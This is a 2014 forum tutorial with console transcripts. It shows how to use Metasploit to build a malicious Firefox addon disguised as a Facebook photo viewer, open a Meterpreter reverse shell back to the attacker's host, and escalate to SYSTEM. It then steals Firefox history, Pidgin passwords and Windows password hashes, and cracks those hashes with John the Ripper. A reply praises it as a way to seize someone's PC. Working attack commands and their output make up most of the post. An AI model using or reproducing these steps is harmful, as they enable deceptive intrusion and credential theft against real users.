crossbower Posted February 4, 2014 Report Posted February 4, 2014 Mozilla Firefox Bootstrapped AddonPlatform: victim=Windows 7 / attacker=kali linuxRank: ExcellentPrivileged: No / but with payload windows/meterpreter/reverse_tcp YESMission : getsystem access with SYSTEM privileges rightget pidgin credsget hashdump and crack the hashget firefox history stolen credsDescription:This exploit dynamically creates a .xpi addon file. The resulting bootstrapped Firefox addon is presented to the victim via a web page.The victim's Firefox browser will pop a dialog asking if they trust the addon. Once the user clicks "install", the addon is installed and executes the payload with full user permissions.As the addon will execute the payload after each Firefox restart, an option can be given to automatically uninstall the addon once the payload has been executed.References:https://developer.mozilla.org/en/Extensions/Bootstrapped_extensionsTippingPoint | DVLabs | XPI: The next malware vector?First steep we starting and run the services and msfconsoleroot@kali:~# service postgresql start && service metasploit start && msfconsoleWe get searching for firefox_xpi founding an exploit bootstraper addonmsf > search firefox_xpiMatching Modules================exploit/multi/browser/firefox_xpi_bootstrapped_addon 2007-06-27 00:00:00 UTCexcellent Mozilla Firefox Bootstrapped Addon Social Engineering Code Executiowill be configuring the exploit:Basic options:Name Current Setting---- ---------------ADDONNAME HTML5 Rendering EnhancementsSRVHOST The local host to listen on.SRVPORT The local port to listen on.URIPATH The URI to use for this exploitIn the video tutorial in configured for facebook-photo viewerADDONNAME facebook hidden foto viewerSRVHOST 192.168.1.19SRVPORT 80URIPATH /facebook-photo-viewer.xpimsf > use exploit/multi/browser/firefox_xpi_bootstrapped_addonmsf exploit(firefox_xpi_bootstrapped_addon) > set ADDONNAME facebook hidden foto viewerADDONNAME => facebook hidden foto viewermsf exploit(firefox_xpi_bootstrapped_addon) > set SRVHOST 192.168.1.19SRVHOST => 192.168.1.19msf exploit(firefox_xpi_bootstrapped_addon) > set SRVPORT 80SRVPORT => 80msf exploit(firefox_xpi_bootstrapped_addon) > set URIPATH /facebook-photo-viewer.xpiURIPATH => /facebook-photo-viewer.xpimsf exploit(firefox_xpi_bootstrapped_addon) >Setup a listener payload without official payloadsPAYLOAD windows/meterpreter/reverse_tcpLHOST 192.168.1.19LPORT 443msf exploit(firefox_xpi_bootstrapped_addon) > set PAYLOAD windows/meterpreter/reverse_tcpPAYLOAD => windows/meterpreter/reverse_tcpmsf exploit(firefox_xpi_bootstrapped_addon) > set LHOST 192.168.1.19LHOST => 192.168.1.19msf exploit(firefox_xpi_bootstrapped_addon) > set LPORT 443Setup the available targets0 Universal (Javascript XPCOM Shell)1 Windows x86 (Native Payload)2 Windows x64 (Native Payload)3 Linux x86 (Native Payload)4 Linux x64 (Native Payload)5 Mac OS X PPC (Native Payloadmsf exploit(firefox_xpi_bootstrapped_addon) > set TARGETS 1TARGETS => 1msf exploit(firefox_xpi_bootstrapped_addon) >exploits -jAnd run the exploit and the exploit creates a .xpi addon what we be presented to the victim via a web page .Once the victim clicks "install", the addon is installed and executes the payload with full user permissions.msf exploit(firefox_xpi_bootstrapped_addon) > exploit.[*] Exploit running as background job..[*] Started reverse handler on 192.168.1.19:443msf exploit(firefox_xpi_bootstrapped_addon) >.[*] Using URL: http://192.168.1.19:80/facebook-photo-viewer.xpi.[*] Server started.[*] 192.168.1.202 firefox_xpi_bootstrapped_addon - Sending xpi and waiting for user to click 'accept'...[*] 192.168.1.202 firefox_xpi_bootstrapped_addon - Sending xpi and waiting for user to click 'accept'...[*] Sending stage (769024 bytes) to 192.168.1.202.[*] Meterpreter session 1 opened (192.168.1.19:443 -> 192.168.1.202:49207) Now the game started , hunting for pidgin creds ,hashdump and firefox creds.Interactive meterpreter with session 1 ,>> getsystem for obtaining access SYSTEM priveliges.We have searching a service when running on SYSTEM priveliges on the remote system and migrating in this process.I used PID nr 29802980 468 svchost.exe x86 0 NT AUTHORITY\SYSTEMmeterpreter > getsystem...got system (via technique 1).meterpreter > migrate 2980meterpreter > migrate 2980.[*] Migrating from 1560 to 2980...[*] Migration completed successfully.meterpreter >getuidServer username: NT AUTHORITY\SYSTEMmeterpreter > Now the system is ready for extracting the creds : firefox ,pidgin and hashdump.Now put the session opened in background and extract de firefox creds.Using post exploitasion windows/gather/forensics/browser_historymeterpreter > background[*] Backgrounding session 1...msf exploit(bypassuac) > use windows/gather/forensics/browser_historymsf post(browser_history) > set SESSION 1SESSION => 1msf post(browser_history) > exploit -jThis modules serching cred in firefox ,chrome,skype[*] Gathering user profiles[*] Checking for Chrome History artifacts...[-] Chrome History directory not found for redmon[*] Checking for Chrome Archived History artifacts...[-] Chrome Archived History directory not found for redmon[*] Checking for Skype artifacts...[-] Skype directory not found for redmon[*] Checking for Firefox artifacts...[+] Firefox directory found redmon[*] Downloading C:\Users\redmon\AppData\Roaming\Mozilla\Firefox\Pr ofiles\3dtmxh0g.default\places.sqlite[+] Firefox artifact file saved to /root/.msf4/local/redmon_Firefox_3dtmxh0g.default_places.sqlite[*] Post module execution completedDONENow we using a exploitasion for pidgin cred'smsf post(browser_history) > use post/multi/gather/pidgin_credmsf post(pidgin_cred) > set CONTACTS 1CONTACTS => 1msf post(pidgin_cred) > set SESSION 1SESSION => 1msf post(pidgin_cred) >[*] Checking for Pidgin profile in: C:\Users\redmon\AppData\Roaming[*] Found C:\Users\redmon\AppData\Roaming\.purple[*] Reading accounts.xml file from C:\Users\redmon\AppData\Roaming\.purple[*] Collected the following credentials:[*] Server: <unknown>:5222[*] Protocol: prpl-jabber[*] Username: msftester@exploit.im[*] Password: unixunix[*] Collected the following contacts:[*] Buddy Name: wuala@jabber.ru[*] Alias: wuala[*] Protocol: prpl-jabber[*] Account: msftester@exploit.im[*] Post module execution completedDONENow using exploitasion for extract the hashdump and crack itWe need be returned in session openedmsf post(pidgin_cred) > sessions -i 1[*] Starting interaction with 1...meterpreter > hashdumpAdministrator:500:aad3b435b51404eeaad3b435b51404ee :b963c57010f218edc2cc3c229b5e4d0f:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe 0d16ae931b73c59d7e0c089c0:::HomeGroupUser$:1001:aad3b435b51404eeaad3b435b51404 ee:f08f62a151d0b888dd5fe91187c3d968:::redmon:1002:aad3b435b51404eeaad3b435b51404ee:32ed8 7bdb5fdc5e9cba88547376818d4:::meterpreter >NOW cracking the hashesroot@kali:~# echo "Administrator:500:aad3b435b51404eeaad3b435b51404ee :b963c57010f218edc2cc3c229b5e4d0f:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe 0d16ae931b73c59d7e0c089c0:::HomeGroupUser$:1001:aad3b435b51404eeaad3b435b51404 ee:f08f62a151d0b888dd5fe91187c3d968:::redmon:1002:aad3b435b51404eeaad3b435b51404ee:32ed8 7bdb5fdc5e9cba88547376818d4:::" >> pass.txtroot@kali:~# john --format=nt pass.txtLoaded 4 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32])123456 (redmon)iloveyou (Administrator)DONEHave fun and thanks for watching and reading my tut's.http://www.youtube.com/watch?v=0DNBvPTBmow Quote
Guest Kovalski Posted February 4, 2014 Report Posted February 4, 2014 Foarte bun tutorialul, +rep.In doua cuvinte, cum sa luam access total la pc-ul cuiva doar printr-un addon. Quote